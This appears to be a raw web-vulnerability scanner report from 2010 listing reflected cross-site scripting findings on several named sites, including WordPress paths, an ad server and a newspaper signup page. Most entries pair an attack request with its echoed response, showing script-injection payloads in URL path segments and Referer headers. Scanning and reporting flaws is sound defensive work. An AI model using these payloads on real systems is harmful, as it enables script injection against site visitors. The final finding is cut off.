GET /wp-includes/js/jqueryf7802"><script>alert(1)</script>497f51b15d0/jquery.form.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:45 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jqueryf7802\"><script>alert(1)</script>497f51b15d0/jquery.form.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf46"><script>alert(1)</script>266e70571c5 was submitted in the REST URL parameter 4. This input was echoed as cdf46\"><script>alert(1)</script>266e70571c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery/jquery.form.jscdf46"><script>alert(1)</script>266e70571c5 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:46 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/jquery.form.jscdf46\"><script>alert(1)</script>266e70571c5" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b90a6"><script>alert(1)</script>65258fd8b85 was submitted in the REST URL parameter 1. This input was echoed as b90a6\"><script>alert(1)</script>65258fd8b85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includesb90a6"><script>alert(1)</script>65258fd8b85/js/jquery/jquery.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includesb90a6\"><script>alert(1)</script>65258fd8b85/js/jquery/jquery.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e97"><script>alert(1)</script>a925be03a3c was submitted in the REST URL parameter 2. This input was echoed as 97e97\"><script>alert(1)</script>a925be03a3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js97e97"><script>alert(1)</script>a925be03a3c/jquery/jquery.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:44 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js97e97\"><script>alert(1)</script>a925be03a3c/jquery/jquery.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63710"><script>alert(1)</script>af3c0e968c5 was submitted in the REST URL parameter 3. This input was echoed as 63710\"><script>alert(1)</script>af3c0e968c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery63710"><script>alert(1)</script>af3c0e968c5/jquery.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:45 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jquery63710\"><script>alert(1)</script>af3c0e968c5/jquery.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b253b"><script>alert(1)</script>aa32dcf57d0 was submitted in the REST URL parameter 4. This input was echoed as b253b\"><script>alert(1)</script>aa32dcf57d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery/jquery.jsb253b"><script>alert(1)</script>aa32dcf57d0 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:46 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/jquery.jsb253b\"><script>alert(1)</script>aa32dcf57d0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d91"><script>alert(1)</script>cfb53e500cb was submitted in the REST URL parameter 1. This input was echoed as b7d91\"><script>alert(1)</script>cfb53e500cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includesb7d91"><script>alert(1)</script>cfb53e500cb/js/jquery/ui.core.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:40 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includesb7d91\"><script>alert(1)</script>cfb53e500cb/js/jquery/ui.core.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04f2"><script>alert(1)</script>3fa8d97dfe0 was submitted in the REST URL parameter 2. This input was echoed as e04f2\"><script>alert(1)</script>3fa8d97dfe0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/jse04f2"><script>alert(1)</script>3fa8d97dfe0/jquery/ui.core.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:42 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/jse04f2\"><script>alert(1)</script>3fa8d97dfe0/jquery/ui.core.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d160"><script>alert(1)</script>4926c1ae6ab was submitted in the REST URL parameter 3. This input was echoed as 8d160\"><script>alert(1)</script>4926c1ae6ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery8d160"><script>alert(1)</script>4926c1ae6ab/ui.core.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:45 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jquery8d160\"><script>alert(1)</script>4926c1ae6ab/ui.core.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4589"><script>alert(1)</script>0f9b40857bd was submitted in the REST URL parameter 4. This input was echoed as b4589\"><script>alert(1)</script>0f9b40857bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery/ui.core.jsb4589"><script>alert(1)</script>0f9b40857bd HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:46 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/ui.core.jsb4589\"><script>alert(1)</script>0f9b40857bd" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6e3"><script>alert(1)</script>037cd5f80a0 was submitted in the REST URL parameter 1. This input was echoed as dc6e3\"><script>alert(1)</script>037cd5f80a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includesdc6e3"><script>alert(1)</script>037cd5f80a0/js/jquery/ui.tabs.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includesdc6e3\"><script>alert(1)</script>037cd5f80a0/js/jquery/ui.tabs.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 639ff"><script>alert(1)</script>4a985ca9c86 was submitted in the REST URL parameter 2. This input was echoed as 639ff\"><script>alert(1)</script>4a985ca9c86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js639ff"><script>alert(1)</script>4a985ca9c86/jquery/ui.tabs.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:44 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js639ff\"><script>alert(1)</script>4a985ca9c86/jquery/ui.tabs.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fc2"><script>alert(1)</script>d944b3fa538 was submitted in the REST URL parameter 3. This input was echoed as e9fc2\"><script>alert(1)</script>d944b3fa538 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquerye9fc2"><script>alert(1)</script>d944b3fa538/ui.tabs.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:45 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jquerye9fc2\"><script>alert(1)</script>d944b3fa538/ui.tabs.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c078c"><script>alert(1)</script>f268c87e34f was submitted in the REST URL parameter 4. This input was echoed as c078c\"><script>alert(1)</script>f268c87e34f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery/ui.tabs.jsc078c"><script>alert(1)</script>f268c87e34f HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:46 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24582
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/ui.tabs.jsc078c\"><script>alert(1)</script>f268c87e34f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d690e"><script>alert(1)</script>14dcf4a04ab was submitted in the REST URL parameter 1. This input was echoed as d690e\"><script>alert(1)</script>14dcf4a04ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xmlrpc.phpd690e"><script>alert(1)</script>14dcf4a04ab HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:32 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24538
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/xmlrpc.phpd690e\"><script>alert(1)</script>14dcf4a04ab" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63671"-alert(1)-"cf18d483ee4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B; Referer: http://www.google.com/search?hl=en&q=63671"-alert(1)-"cf18d483ee4
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/javascript Content-Length: 1258 Date: Fri, 26 Nov 2010 20:41:52 GMT Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8991e"><script>alert(1)</script>ac2b10b5d18 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 8991e"><script>alert(1)</script>ac2b10b5d18
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 21:14:31 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <!-- saved from url=(0013)about:internet --> <hea ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Leipzig&blogurl=8991e"><script>alert(1)</script>ac2b10b5d18&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad343"><script>alert(1)</script>9f8d47d8d9d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /homedelivery/signup.htm HTTP/1.1 Host: secure.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ad343"><script>alert(1)</script>9f8d47d8d9d
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:25:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.0 Content-Length: 6262 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerNYPOST-SSL-POOL=184592576.47873.0000; expires=Sat, 27-Nov-2010 04:25:09 GMT; path=/
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6341e"><script>alert(1)</script>a7058016663 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
